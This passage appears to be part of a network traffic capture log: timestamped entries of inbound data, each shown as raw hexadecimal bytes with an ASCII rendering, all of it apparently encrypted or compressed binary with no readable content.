f1 e4 86 b9 75 4d 51 69 06 6f 99 97 e2 d5 c9 76 27 0a 82 7e b5 83 32 62 da f5 16 a7 11 32 a6 e5 51 aa 0f 69 82 11 7d 89 92 b0 89 5c 6f bb 38 30 f0 7b 8e d0 7a 58 f4 1c af
                                                                                                                                  Data Ascii: '_QQ7G)d?+,od|)ButT) UA6@Kx-JsL]K0a^~d|ssWe'Y7-* UQh9xQ1lO^_^pY"-z^>"r,:25_uMQiov'~2b2Qi}\o80{zX
                                                                                                                                  2022-01-11 22:38:59 UTC875INData Raw: 65 1e be 6d 29 dd 20 e8 b9 18 0c 5b c6 9e b4 a9 d1 9a ac 5e 24 eb c6 53 fe ec cf 52 97 f0 e2 aa 18 3c e5 dc a9 15 30 37 bd ab c3 d3 10 32 1a c9 43 a0 cf 7b 1b 8c be 97 c5 89 b1 fe e1 24 5b fa f7 a8 95 d2 77 8a 3b 89 8b 76 64 12 ce 88 a6 b3 45 58 12 84 d1 21 6d 95 2d 1e 19 ae 78 c3 cf 74 a1 c1 2b 8e 91 ac b3 82 5e ec 14 1f 25 7a 39 5b e3 50 05 8f 8f 1f 77 64 74 07 de ae 57 c4 b9 97 23 9a a3 64 e2 a8 09 2c 1b 44 d6 3b 04 15 bb fa ad 9d fb fe c5 0a 7c d3 7d d2 73 75 bd a1 f5 bb de b7 bb 16 90 9f b7 4c 0c 31 17 34 78 08 23 4c 57 6a bd af b0 07 6e 66 18 f3 07 db b5 99 47 48 02 72 9b 66 e1 3d 83 b9 b0 36 f0 5a 78 d6 4c 2b 5c 74 34 83 f9 9d 00 42 34 b0 0e db 22 4f 8c 2b 09 2e d0 83 91 78 35 70 dd 7e f0 fb d1 7e 02 c0 c7 ae e1 96 9c 91 e0 c6 15 77 48 7c ac 6a 2c
                                                                                                                                  Data Ascii: em) [^$SR<072C{$[w;vdEX!m-xt+^%z9[PwdtW#d,D;|}suL14x#LWjnfGHrf=6ZxL+\t4B4"O+.x5p~~wH|j,
                                                                                                                                  2022-01-11 22:38:59 UTC883INData Raw: d9 4f d1 6f d2 98 99 da ec 8c b7 58 2f c2 d4 8c 59 5e 98 43 04 17 87 6b 67 1d c0 d0 dd 2d 23 a3 2e f6 4a ac 69 11 e2 95 4f a8 0a ea d0 c6 3c 38 5b fb 64 b2 42 c8 5b 18 8b 76 7c 39 31 24 9e 84 4a 29 19 64 34 50 11 3d 4a 11 ed d8 4a d7 38 b4 d2 9d be 9a 59 b8 7b a2 fb db 9a 46 74 b1 98 ad 77 6a e4 74 d9 6e 12 a7 95 7e d4 ec d1 35 c4 81 a3 a0 06 80 73 46 4b 25 cb 43 5e af fd b8 de 57 7f cc 54 b9 94 7a 5c 56 b5 d7 76 c2 5b 5a 53 98 57 12 61 c5 d8 1c d4 4b e3 b2 81 47 27 5e 80 ef 13 56 f0 4a 15 ea 56 de 7c 37 1b db fe ca 47 b8 ac e3 d4 79 c7 6c 85 3d 9b 21 1a a0 91 32 da 6e 06 f9 21 56 c0 a2 20 c5 cc 0b 0d 68 f1 c6 8c f8 58 8c 13 13 f0 e0 b5 43 1f e9 43 ad dd a6 e8 62 4b a4 31 ba 50 0f ee 0a 30 85 a3 c7 c8 4c 67 72 13 91 5e 9b f7 29 b1 b1 31 57 d7 e3 b5 a2 7c
                                                                                                                                  Data Ascii: OoX/Y^Ckg-#.JiO<8[dB[v|91$J)d4P=JJ8Y{Ftwjtn~5sFK%C^WTz\Vv[ZSWaKG'^VJV|7Gyl=!2n!V hXCCbK1P0Lgr^)1W|
                                                                                                                                  2022-01-11 22:38:59 UTC891INData Raw: 17 5b 85 cf 23 39 3e e8 aa 1d 76 f5 cf 69 da 5a 2e c0 ea 19 44 4e 37 0c 78 b3 26 f3 b0 ff e7 bc e0 ca d5 34 91 36 b4 11 13 d9 d9 63 5e c4 7f 70 c4 d9 29 eb f1 c8 3b f1 ab 19 f9 75 12 15 89 d2 64 36 25 ea a4 bc a4 11 df 91 9b db 1e a4 45 e6 8a 29 94 ab cc c2 a2 36 85 6f bb 3f b3 e2 fa 0f e5 1a 94 ab ae ef 28 6b 7b 97 ac 85 72 e2 9d 28 2a ba 43 2d b1 a1 f8 41 ae 64 2f 0d 51 10 af ba e9 95 c9 4c 6c 28 4d e9 e5 01 f1 75 74 4b e3 5c ff e5 9b 0b c6 d8 3a 1f 97 4f fc 7d ad 66 43 0d c1 e6 57 2a 35 69 48 cf 03 98 3c 74 b0 16 2e 39 91 f9 40 ea 97 78 5e fb a0 c7 7b ae d5 26 0f 5a 52 2a 64 ff ef 59 e3 68 08 4d 42 9d fc f2 80 27 b2 3f ab ed 8b f9 08 1b 19 fd 87 d5 67 a0 b5 02 c8 d7 6d 4a ce 4c 75 ac a8 d5 08 95 39 ea 16 6f bb 4a 6e 71 53 db b4 4f 0b 3f 52 0f b7 c4 40
                                                                                                                                  Data Ascii: [#9>viZ.DN7x&46c^p);ud6%E)6o?(k{r(*C-Ad/QLl(MutK\:O}fCW*5iH<t.9@x^{&ZR*dYhMB'?gmJLu9oJnqSO?R@
                                                                                                                                  2022-01-11 22:38:59 UTC899INData Raw: 4c 73 10 92 d7 70 d3 46 48 4b 36 06 ad ca 6c 7f 58 db d6 a1 9b ac 70 b3 e5 c0 bf 71 b8 9b 9b ac 4a b2 19 01 e4 98 51 0c e7 d9 21 97 5f b3 12 b8 2d ba a0 dc f7 aa f5 bd 7c 46 5b 52 14 39 36 be 7a 71 e0 27 58 b0 3c e8 50 de 2e be 11 b1 5e 85 99 b6 b2 8f 81 67 7f b8 bd 51 b9 2e f2 b7 58 15 15 dd 8b 5b 20 c1 16 54 7b ba 9b 47 16 85 23 d9 29 e6 f3 7f 51 0f 51 b8 d8 1d 0d d2 bc 03 57 87 15 e0 2d 3a db a5 96 3b 20 92 40 04 07 08 7b dc bf 11 25 1e a5 7f 7f e4 5a 52 ed 16 2d 1c f3 4d e1 4a 18 a4 43 89 58 6a c0 b8 c8 f1 3e a2 03 9d d4 8c a4 e7 e6 86 1f 34 3e b3 55 a2 4f 99 e5 eb f5 f5 95 9d 3b 7d 47 58 60 0a 22 7c 81 ac 36 3d f5 e0 33 92 26 5b 70 78 35 f2 48 b6 52 1c af 39 1f 6b df 28 3f e3 04 61 11 78 1e 85 68 6b 80 ff 3d 27 56 a3 76 d9 db 47 da 98 b0 df 23 0d 77
                                                                                                                                  Data Ascii: LspFHK6lXpqJQ!_-|F[R96zq'X<P.^gQ.X[ T{G#)QQW-:; @{%ZR-MJCXj>4>UO;}GX`"|6=3&[px5HR9k(?axhk='VvG#w
                                                                                                                                  2022-01-11 22:38:59 UTC906INData Raw: 25 6b 2f a3 ff 19 2f 8d 6c 19 4a a6 e0 d3 93 aa a1 0d 17 15 7d c9 65 07 fa 1e 79 c6 f3 f8 7a 2f 47 a2 ab 4e c8 12 a8 9e b6 94 c2 db 4a 8a 8b bd c9 52 52 8d 9f ce f3 eb 3c b7 57 d8 14 04 5a ac da 41 9f 1e 2e e0 e5 cc 00 0f 93 cc b9 38 0d 31 6b 95 1a 14 e6 bd ad d9 ce b0 ee 21 d7 52 dc fa 50 09 60 08 8d 8b 16 bb 77 4b d1 74 61 d0 40 3a f7 4a 24 7b d8 be 2c 5e bd 7a 9d 6d ec f4 7b ed 6f 95 02 49 30 56 74 63 ac 5b 20 07 e7 ba 2a 4d bb 44 d7 1e 9d 4a 7b c4 a8 2c f4 a5 b1 b0 72 4c c6 95 73 f5 69 9c 2b 54 4a d0 f2 4f 68 c2 a8 25 ff 18 d4 7f 9d 97 68 79 9e ef 89 ea 2c 2e e7 3e 8f ac c4 9f 46 28 e8 b0 b3 8d 99 66 86 a1 cd 4e 0b 09 05 9a 34 90 85 82 e4 29 39 b5 b9 79 46 5c fc f7 8c b7 19 12 ea 9e 5d c5 5e fd 56 52 00 14 c8 c7 5c a5 4a 7f 43 21 0a 94 05 60 1f 45 e1
                                                                                                                                  Data Ascii: %k//lJ}eyz/GNJRR<WZA.81k!RP`wKta@:J${,^zm{oI0Vtc[ *MDJ{,rLsi+TJOh%hy,.>F(fN4)9yF\]^VR\JC!`E
                                                                                                                                  2022-01-11 22:38:59 UTC914INData Raw: 9e 5f fa 65 d3 84 35 17 34 92 5f d8 28 8c fe 6b ed ce 4f 85 9e b7 64 ca ee c1 08 af 46 2a 90 8f 18 f6 37 8e 68 ad fe e3 ed 83 09 5f c7 de c4 5d 68 3e 27 c9 f4 fb e8 e5 63 50 79 83 52 97 14 31 03 84 a8 20 af 4c d7 36 6d 11 86 65 07 c9 03 ce aa 79 3c c5 a3 ac 3c 66 36 ea 96 d9 5e bd a6 52 14 d0 38 af 31 54 cb eb 82 97 2e 61 0c 78 d9 c3 72 a3 07 3e 07 9f a7 fd 44 67 9b ae 74 d9 d2 70 b3 cb bb 7b 5e 03 78 a9 47 7e a3 58 98 8e c8 d1 35 78 ec ae e0 f2 61 79 9e 6c bb ef 99 99 5f 58 63 09 51 27 15 35 01 c5 21 b2 60 81 76 b5 5d dc eb 1a 92 f3 38 34 d8 2e 1c 5d 9e 8b fb 02 ca b0 2e 1c 20 55 c1 13 6d 9a ff 68 77 b3 f8 81 5c 70 99 28 74 13 97 4b 49 4d fa a4 be ad b0 07 75 54 66 30 fe f2 a4 2d 85 73 b3 30 4e 53 61 ba 1b 4c 7e 4e d0 25 e9 07 f0 21 0b 14 6b c9 ff ad a8
                                                                                                                                  Data Ascii: _e54_(kOdF*7h_]h>'cPyR1 L6mey<<f6^R81T.axr>Dgtp{^xG~X5xayl_XcQ'5!`v]84.]. Umhw\p(tKIMuTf0-s0NSaL~N%!k
                                                                                                                                  2022-01-11 22:38:59 UTC922INData Raw: 56 04 66 dc 9a 30 7d 79 ff 32 92 5a 96 89 ed e7 31 f7 44 ad f5 92 59 9e c0 59 3c ac 76 2b 97 9e 64 73 f8 9b 35 b2 12 06 3f 1f f7 57 5c c2 0b 4c fd 98 27 83 ba db a6 8a 2f 61 75 0a 9f 0f 8b aa b3 35 f7 db 30 4b 0f 9e 83 20 be 71 f9 65 e0 91 63 36 67 bc 2a 82 4a cb e3 3a 59 8c c4 fa 95 12 5d f1 1a cf f6 4c 9f 80 c1 32 a3 6e 5a d1 b1 ed ce 91 15 69 a4 b9 07 45 11 65 1f d0 90 38 39 89 56 b6 e8 35 31 bb 10 f5 fb 23 d8 a6 86 52 10 89 26 42 0b f9 e1 cc d7 06 b1 4e ce 66 f9 83 eb 04 d1 0d 65 a7 55 cc 21 18 a6 46 f9 c4 0b f9 38 7b 49 99 47 f0 4a e1 3a 3b 59 13 2d 12 76 c9 9d 31 7c 54 1c dd 53 c1 06 72 cb 88 87 db 7a 56 8b 20 b8 af 2c 4b ac 80 0f 08 34 30 e1 cd 0d a4 8d 58 94 4f d6 43 c0 2e ff dd 6e 0f 58 01 13 80 cb 0c f9 11 fe a6 41 47 2a c4 c1 db 1c b9 01 c9 04
                                                                                                                                  Data Ascii: Vf0}y2Z1DYY<v+ds5?W\L'/au50K qec6g*J:Y]L2nZiEe89V51#R&BNfeU!F8{IGJ:;Y-v1|TSrzV ,K40XOC.nXAG*
                                                                                                                                  2022-01-11 22:38:59 UTC930INData Raw: 04 f3 2a 3e 85 fb 25 fc 07 ec fe 0b b8 10 43 f6 b0 93 91 7c 82 e0 53 ee 7d 7d 6c cd 4f 87 3f 94 57 41 91 5d 02 1a 34 af f6 26 90 73 d5 b0 fa 4b d0 d1 a2 35 70 25 24 ce ed 52 44 7c d2 9e 7a d9 8b 9a 19 60 6d 13 c6 5d 5f 9d 33 71 c3 e6 d9 6e 21 0d 21 8a 17 b7 6e 91 c8 9c 77 ee ac d6 df eb 05 5e 42 d4 66 8f 3a af fd 6d 11 d7 05 e2 d2 b6 c1 76 78 a7 48 59 33 6e 5d 80 d0 49 bb 08 9f 07 f5 dd 03 ab dc ce 48 ec fb 23 d8 7d 5f 5a 74 b4 d0 70 31 22 98 60 4c 91 63 bf b7 e1 c2 7a f5 6f ab 90 fc 1f 50 8d 95 6c 9f 5e 4e b3 2c 50 0d 26 44 3a 43 24 99 80 47 1e 9a 80 5a 18 dc 44 5c ca dd 17 9b c2 57 3f 66 68 80 9a bc 79 26 58 cb 4b 4e ac 24 45 d0 3d 4e e7 14 b3 0e 4d 7b 94 7f c9 33 16 e4 e0 ea ad d9 0d ac c2 4d c3 80 e5 2c f6 8a dd 6b f5 1b 3f ab ce d1 04 5f cb 4a be 1d
                                                                                                                                  Data Ascii: *>%C|S}}lO?WA]4&sK5p%$RD|z`m]_3qn!!nw^Bf:mvxHY3n]IH#}_Ztp1"`LczoPl^N,P&D:C$GZD\W?fhy&XKN$E=NM{3M,k?_J
                                                                                                                                  2022-01-11 22:38:59 UTC938INData Raw: e7 e2 d9 93 51 71 ed 91 03 d4 17 16 4a 96 bb d8 9e 92 d0 49 d4 c5 d6 92 f4 78 fe b4 0b db 02 25 60 81 0f f3 26 98 37 dc 78 2b f6 fd 48 12 eb bd f7 d4 5b 11 41 ce 0c 8c fd 0e cc f0 e9 2e f7 cd ef ef 02 10 7b 58 40 1c e6 52 f1 cf 0b 3b 8a 50 e9 7b f4 76 01 3a 72 6f 1f 2d e2 63 de d9 b2 ca 95 f8 01 02 99 42 04 98 f9 a1 59 8a 32 33 9f f3 dd 8f 93 48 85 0d e0 e0 37 e4 3c 6a eb 62 f0 b2 71 7d 4b 68 d6 1a ba a7 5e 2e 2d f1 fe 76 26 52 c0 69 6a 7d 33 0a d6 9b 64 35 ca 88 f3 b6 53 23 47 46 8b 3c 50 b8 ca 3c 57 a5 0b 2e cf 58 cb db cb fb 24 cd 3b 3e 30 1a 45 bc 8e b5 28 b9 dc 57 da f0 ab 79 42 0d 2e 2a 52 4f 64 bf aa 37 ea 12 5d 45 34 13 70 7a 7a b3 d5 1c b8 18 92 d7 ef 56 a4 7e 35 ee 88 b8 86 ad d4 87 5b 4c bb df ca bb 44 7a 1a 3b 0b 77 55 05 45 87 28 57 16 a2 23
                                                                                                                                  Data Ascii: QqJIx%`&7x+H[A.{X@R;P{v:ro-cBY23H7<jbq}Kh^.-v&Rij}3d5S#GF<P<W.X$;>0E(WyB.*ROd7]E4pzzV~5[LDz;wUE(W#
                                                                                                                                  2022-01-11 22:38:59 UTC946INData Raw: c0 c4 f8 df ae bc d0 98 1f 99 21 11 00 c6 54 30 53 b5 d7 ce 69 7f ac 22 8f a4 ef 86 f6 eb a7 d3 d0 3a 34 62 9e 4c 5f bf 5d 9c 2a 6b e7 8b 33 eb ea 13 61 31 6e a8 b4 72 ac b2 dc 8a b8 6d 5f 8b d9 2e df 48 93 b9 46 e8 bf bc 98 af d4 7b 9e a3 27 ce 5a c4 44 b1 0e 70 b7 95 72 91 fb e7 cb 47 9f 6a 84 0d 56 a4 39 aa 35 4e e6 fb 7c 9f 04 0b 4c ed da 18 e6 e1 09 9e 88 e4 43 48 a6 1d a9 9a cd 75 bd 45 13 44 32 24 e4 b0 28 f2 19 3b 5c 62 8e 1c cc 9a a9 35 da 24 29 d9 76 19 37 bd 18 47 39 4f a0 74 e1 c5 90 bf 91 75 fe 16 3d 5c 47 fb d2 da 48 87 a2 a6 62 f6 f5 73 90 fc 0f fd f9 4e 81 df 85 ca dc f2 82 ca 07 ec 19 de c0 85 84 1d da 7d 69 3f eb fd 97 8d be 91 41 44 b1 ff df 3d 0b 22 9c 04 14 f5 68 eb af 69 2e ab 54 f4 4d 8a 5c 2b f6 40 65 2c 92 46 87 a3 ea 36 cc aa 02
                                                                                                                                  Data Ascii: !T0Si":4bL_]*k3a1nrm_.HF{'ZDprGjV95N|LCHuED2$(;\b5$)v7G9Otu=\GHbsN}i?AD="hi.TM\+@e,F6
                                                                                                                                  2022-01-11 22:38:59 UTC953INData Raw: 8d b5 ad 26 3c 4c 57 aa 80 b8 d7 9c b8 03 ef 64 b4 95 3f 88 27 a7 6c 70 3d b5 db 4a e8 48 39 f7 2b 89 5c b0 81 69 5a de 46 d1 cd 89 62 13 0c 36 a8 f2 78 c9 71 15 7c 33 dc 1a 39 e2 45 04 38 64 6a eb c4 00 e3 49 c6 dc 3f 42 4c 9c 17 a6 3a 5f a8 14 b6 53 05 f9 47 fc 37 30 2c 29 d1 c7 33 9a a2 8f 4d 25 cf 41 fb b5 43 25 e8 70 06 84 ec f9 b2 51 29 58 40 0a 94 a0 9f d5 a2 a4 12 b7 8e eb 37 8e 00 44 2b 60 d1 6f 5f 1b 0d f7 61 eb 10 8b 2b 1c 22 e5 3c 08 75 29 84 b5 4e 7a a9 8b fd 77 9b 69 ac ca 38 da 15 6c 20 d6 a8 35 76 ec 2d 3e 0d ee c9 59 59 77 ca ef e6 36 f5 38 ed 2b be 5d a8 d7 f9 13 3a 73 4f 65 f8 1c 37 93 de a7 93 b2 37 f0 8a bc 29 b1 f5 5e 9a 09 99 a7 cf b1 72 07 4c ca 98 8f ea e4 75 16 c3 09 21 12 b5 17 1f d8 e3 91 05 6a b4 09 db 20 b5 00 b7 4e 3a 13 56
                                                                                                                                  Data Ascii: &<LWd?'lp=JH9+\iZFb6xq|39E8djI?BL:_SG70,)3M%AC%pQ)X@7D+`o_a+"<u)Nzwi8l 5v->YYw68+]:sOe77)^rLu!j N:V
                                                                                                                                  2022-01-11 22:38:59 UTC961INData Raw: 23 d2 25 de 35 17 ca 41 cf 01 7e d6 ab 89 84 8d 78 f0 3a f0 4e 21 c9 f6 38 b4 98 5c db bc 80 4e a0 b6 c2 bf 56 f9 04 3e ab 7f 5a 86 57 1d 67 51 d0 77 ea b7 0d 84 25 95 d8 b8 bb 73 24 d6 65 40 41 34 0b f5 f6 4f db 8e 93 42 91 c8 04 91 d4 2f c8 fa 48 90 3c 0c 31 3d 50 ab 78 f3 99 4b 44 ac 5e 67 19 10 13 8d ce 6d 1a 37 da 27 cf af 32 28 6d 71 6a 43 78 d0 79 bc 8c b8 7a 22 83 92 f2 e5 83 24 ce 89 91 69 ac 88 49 e9 ac ee e8 a4 70 56 29 a1 22 90 e4 d1 2e 74 2e 1a ef 2b 0a 77 a2 9e 87 fa 46 39 0b b4 b2 57 b4 b0 62 fe bb c1 a8 cf b4 c8 da fc 2d b7 8c 66 a0 db ab c5 fc a8 f2 02 ce 23 77 15 ea 91 2e f5 85 dc af fa 88 9e be 92 72 f8 6b 3f 57 56 3d f6 f8 5c 80 89 88 74 ac 6e 3b ee 75 6d 3d 16 46 66 b8 aa 7a 6f 73 cc fd ed 03 a9 31 19 c4 2e a4 ad b3 d5 94 97 21 a1 71
                                                                                                                                  Data Ascii: #%5A~x:N!8\NV>ZWgQw%s$e@A4OB/H<1=PxKD^gm7'2(mqjCxyz"$iIpV)".t.+wF9Wb-f#w.rk?WV=\tn;um=Ffzos1.!q
                                                                                                                                  2022-01-11 22:38:59 UTC969INData Raw: 53 2e 83 ef ed 43 6b a8 60 e8 6a 31 6b 3d 32 79 66 38 2a e5 1a f4 ab 8a 41 85 91 50 bd 0c 98 07 32 06 fd f3 12 76 c3 05 9c 25 57 81 f1 db 89 32 7a 1e aa c6 5f eb c0 2d ed 5e 90 13 89 a8 58 53 d6 e8 f8 c0 54 03 11 de 42 66 9a 6e c6 fa e1 a4 a0 73 3b b2 9e 95 9b 8a ac 1f 0b 6d 07 cc 25 65 79 a7 1b 99 4a ac 69 c3 58 96 84 42 e4 7b 39 97 dd bb 27 20 cd 32 b3 4b be 6e ba dc 54 f0 2d 4a a9 22 cb 7a 44 eb cc f2 de f7 aa de f0 0b e0 51 50 02 46 11 4f a3 d7 27 46 ec 35 46 c9 ad fd 99 17 06 4b 38 fc 7e 30 86 da c3 9f c6 7b 0c d1 47 29 73 77 3e 29 78 ff ca 5e ac d2 2e 06 8b 1c 8e f5 38 e4 11 55 3d f1 44 a7 91 3f d4 09 70 88 09 b7 b3 02 a4 1b 4c 21 70 bc 30 99 63 bb a5 43 92 f3 2e 31 1f be db bf 87 92 2d bb 17 4b 6e 3a 56 01 34 8d 19 15 36 06 71 94 74 62 e0 8d 20 33
                                                                                                                                  Data Ascii: S.Ck`j1k=2yf8*AP2v%W2z_-^XSTBfns;m%eyJiXB{9' 2KnT-J"zDQPFO'F5FK8~0{G)sw>)x^.8U=D?pL!p0cC.1-Kn:V46qtb 3
                                                                                                                                  2022-01-11 22:38:59 UTC977INData Raw: 0f e3 7b dc 4d 31 b0 99 26 ce f2 db c8 cb 04 86 2e 50 f5 9d bc c7 53 1a b9 64 5e 48 92 f0 2e ed 93 0e 40 bb 1d 0a c2 26 30 ab fe bf 1b d9 f5 00 01 d4 45 2e da cf 6f 26 ed 00 a5 0a 51 91 d5 32 0e b0 07 ea 47 e2 76 65 41 bf 76 be ea b9 6b d4 00 ef aa 84 24 7a ea 73 a9 47 0e d8 6c 8e 1b a8 28 5b a4 ac 8e 6b bf 3b 8a 93 30 24 61 60 f1 83 63 35 47 b6 5d 68 0a 14 e8 85 d1 5f 61 4c f2 56 37 99 37 4e 77 4d b8 38 b8 3a d6 8f c2 c5 60 de 5c 09 94 d1 df 09 71 56 e7 e4 ac 5f 61 38 37 f1 dd 58 bb 5b c8 cc fb 5e d1 59 17 63 23 eb 5b a3 a2 02 df a0 7f 7f 98 0e 54 73 87 7a 75 d4 97 f6 4b 7e 20 4f f4 70 4f c5 70 81 8a c9 4e a0 46 d9 98 0e 48 43 c6 7b 91 d8 1f a5 28 16 9a 9c 98 3a 3d 56 85 5c 6e 32 26 9d 31 0c de fc 22 7e b4 4c bb 5e 23 51 79 74 b4 a7 28 66 e9 c1 d3 3f 88
                                                                                                                                  Data Ascii: {M1&.PSd^H.@&0E.o&Q2GveAvk$zsGl([k;0$a`c5G]h_aLV77NwM8:`\qV_a87X[^Yc#[TszuK~ OpOpNFHC{(:=V\n2&1"~L^#Qyt(f?
                                                                                                                                  2022-01-11 22:38:59 UTC985INData Raw: e5 d6 6d ae 32 37 b1 f2 d1 1d 56 98 af fe c7 f3 77 3d 67 b4 0b 5a 02 69 32 24 12 28 c7 4f 76 fa 21 d9 a8 b6 1c af eb 66 52 f0 01 74 45 5a ea a3 29 f0 b7 e2 b2 24 f5 19 c8 22 84 bb 6a 40 be 2b 96 0e d7 e9 62 b4 4a ce c3 cc 0f ed 81 c9 5e ad 87 c5 21 b5 7b 55 fe 80 56 e5 ba ae 47 29 14 a3 c3 d3 f4 d6 95 b7 b7 c5 0f 1f ff b0 7f 56 e1 88 5e 9b 59 99 7e 18 37 cd 7a d2 61 9a 53 38 45 5f d0 07 25 c6 bf 01 25 89 a1 6f a1 5f 34 fb 00 2a ea 50 0c 18 2e 19 97 c9 55 e5 b0 bb b8 33 93 2c c4 39 97 08 ec 86 34 59 98 b3 cd ef 1f 99 bc b8 83 23 39 46 8c 77 ac 04 03 5f 24 9a 0e 7b ff 57 e1 7f e6 07 cc 9b 75 cb dd ac aa c9 23 f9 3e 2d ee 96 81 f4 19 ea 4c 5e d9 34 c2 b7 3d a1 65 d8 42 04 ca b9 2e 67 e6 90 b8 dc 46 8d c5 52 73 5a 7f 5a cb fa 49 86 1a cb d9 10 a7 f9 7c 44 9b
                                                                                                                                  Data Ascii: m27Vw=gZi2$(Ov!fRtEZ)$"j@+bJ^!{UVG)V^Y~7zaS8E_%%o_4*P.U3,94Y#9Fw_${Wu#>-L^4=eB.gFRsZZI|D
                                                                                                                                  2022-01-11 22:38:59 UTC992INData Raw: 4d 2d b0 c5 21 ab 15 37 5e 70 7f 92 46 a0 2e 2f a1 0f 26 87 92 09 0f 1b 02 8d 1d 2e e5 e7 11 2f 94 12 ed 47 b4 c5 c6 77 df 40 ac 2c db 5f 37 fe 6e b9 94 17 01 d1 96 93 9a 2a 91 24 43 b4 81 be 83 62 3b 61 05 86 f4 f5 5d f2 d1 4f e3 16 78 f0 f1 4e ea 21 51 36 4c ee ac 1b 99 8b dc 79 2b 01 9c 9b 90 72 54 cc 69 1f aa 75 3a bb e0 37 20 85 ab cd d4 b5 17 5d e5 48 b5 3e 93 8a d0 22 b2 3e 41 37 69 a8 9a 13 51 89 98 01 8e 89 14 48 5c ba cf 6f 33 be 2b c0 0d 67 b9 0a ce 99 8c 87 18 1d d6 2c f1 96 41 90 43 6e ab f6 c6 10 54 fd 86 f2 57 a2 1e 0b 7c 16 5f 56 45 26 42 8f c2 62 f5 fc dc ec 67 d5 b8 3c b7 b4 da d8 f9 6c a4 31 8d f6 b6 46 08 ab 0d 19 84 ef 84 ec 25 e8 57 9c be ca b9 bd a6 7a 1f 1f 37 45 a7 07 a0 67 76 7c 37 19 53 79 88 20 0e a5 11 4b 4f 3b 2f ba f3 a8 f1
                                                                                                                                  Data Ascii: M-!7^pF./&./Gw@,_7n*$Cb;a]OxN!Q6Ly+rTiu:7 ]H>">A7iQH\o3+g,ACnTW|_VE&Bbg<l1F%Wz7Egv|7Sy KO;/
                                                                                                                                  2022-01-11 22:38:59 UTC1000INData Raw: f9 64 23 70 61 a8 51 e1 71 92 e1 9f a9 d0 0c 7e 02 da de 31 89 e3 f5 17 29 20 e0 d8 8a d5 17 cb 92 f7 e2 05 1c c7 23 d3 ab 38 69 55 ab 4f 14 da 03 40 bc 0e 21 14 bd e7 44 34 c6 70 5b 22 00 b1 5d a2 13 c1 26 cc 51 70 42 94 60 8a 23 5f 3d f4 97 07 fd 1f a9 4d 42 7b 49 54 60 6f 92 bc 56 3f cd ee f4 eb 01 d9 02 f8 b9 2b 5c 03 39 8c 4d cf 1c 31 f4 6e a7 28 39 d1 72 bf 9f 1b 7c ca b7 92 33 81 34 e2 36 84 a8 dd 7a c3 1b c1 d2 be 12 20 fa 84 a4 30 bb fd 6d 4c c8 92 5c 14 43 42 c5 00 12 aa 6a 6f 39 70 59 28 18 37 99 8b 9b d3 1a 14 ba 69 44 c0 ee 4e c9 7f 8e 4e 8f e6 49 55 bd d1 0a b4 d7 dd 8e 25 31 ca 9d 3c 7c 92 a6 b9 57 84 3a 54 eb 27 42 07 f4 54 d3 40 c9 45 21 a3 00 37 a2 d5 67 03 57 5f 38 cf db 3c ba 04 4f 1a 48 43 4c dc 45 1d df 2d ff f0 49 c5 47 d4 e9 54 69
                                                                                                                                  Data Ascii: d#paQq~1) #8iUO@!D4p["]&QpB`#_=MB{IT`oV?+\9M1n(9r|346z 0mL\CBjo9pY(7iDNNIU%1<|W:T'BT@E!7gW_8<OHCLE-IGTi
                                                                                                                                  2022-01-11 22:38:59 UTC1008INData Raw: 01 36 a8 04 3d dc ae b1 40 c7 ec f2 20 70 38 b0 2f 7b f2 88 58 6f 6e b3 ee ea 8e 34 87 74 92 45 fb 25 e3 c4 ed a1 ec 83 fb 3c 7c c4 94 36 a7 a2 0d 25 e1 5d 7e 16 71 5c 39 be ee 3f 8c b9 c5 49 16 bf 3e 3f f8 e0 8a a2 3d 51 50 5c 09 95 f2 3c 84 6d 2a 30 b0 90 3e e6 4a 8f 2d 8d 33 39 ef e6 1d 58 e5 97 23 a4 6b 41 1e 42 23 3b d5 f8 ab 53 c1 3d a5 94 de c0 b4 4b 1d 6e 6b 88 7c e0 21 23 79 4f ad ea 1f bd 1a 99 83 f3 b4 eb ee 52 7f e4 7e 08 2c d0 cc 48 53 8b c2 97 fd 77 7a 76 35 8a 3f 49 ca 23 c4 6f 4f ff b0 8b a1 7d 26 b8 63 4a f7 ae d2 ca 53 31 e4 fd b4 7d e8 00 ff b7 55 ca 7f e4 27 fd 0c 91 e2 77 15 fc 4c 7b c1 26 51 b1 25 96 8e 65 42 a7 f5 63 09 5e fe d9 93 ff 97 19 b1 01 0e 95 51 54 64 3c 19 00 e6 4f 49 51 2f 8b db 7f fb f4 e1 65 ae 5f 29 72 64 26 a1 50 6f
                                                                                                                                  Data Ascii: 6=@ p8/{Xon4tE%<|6%]~q\9?I>?=QP\<m*0>J-39X#kAB#;S=Knk|!#yOR~,HSwzv5?I#oO}&cJS1}U'wL{&Q%eBc^QTd<OIQ/e_)rd&Po
                                                                                                                                  2022-01-11 22:38:59 UTC1016INData Raw: 05 f4 fc d7 1f d0 b2 05 66 7e ed f9 0a c5 82 7d 20 e0 68 c8 5d 25 03 e2 7f f0 93 33 d8 35 89 dd 8f 8b 20 d5 40 1a 70 08 01 08 c2 d8 1f 65 a1 2c f8 eb 9f 4a d0 30 75 3f 6d 86 4f ae 63 88 34 31 a5 c6 be ce e8 0d 71 bb ba 54 41 43 fa 9b 83 19 dd 8e f4 f2 b7 4f 22 a5 c0 c0 92 90 56 58 38 31 2a 4e 8a 24 28 2a c2 e1 41 77 30 0c 24 a1 2b 9e 81 ce e4 6d c1 73 bd b1 f5 4d b8 50 18 c3 ca cb 86 ec af 23 a0 dc d9 07 5f 72 bc fe 1d 64 e5 d7 ac 72 14 52 21 3a 32 05 2a a4 0d 40 d2 f7 df f5 a9 38 4e 89 e3 e0 f3 22 82 f0 d7 b3 c9 87 ae 90 d5 85 07 69 57 68 de f1 af 91 bb 03 c0 9b 7e cd 34 d0 fa 6b b9 f2 b7 94 f8 75 fa 5c 4f 92 1d ce 8f 85 02 53 73 cf 06 4e 08 e4 9f 10 12 cb d8 df 25 29 44 02 36 79 b4 70 b9 ae 4b 74 8a c4 b7 5d 57 d9 fd 54 cf 1f bd ac d5 e0 fe cc 55 a2 23
                                                                                                                                  Data Ascii: f~} h]%35 @pe,J0u?mOc41qTACO"VX81*N$(*Aw0$+msMP#_rdrR!:2*@8N"iWh~4ku\OSsN%)D6ypKt]WTU#
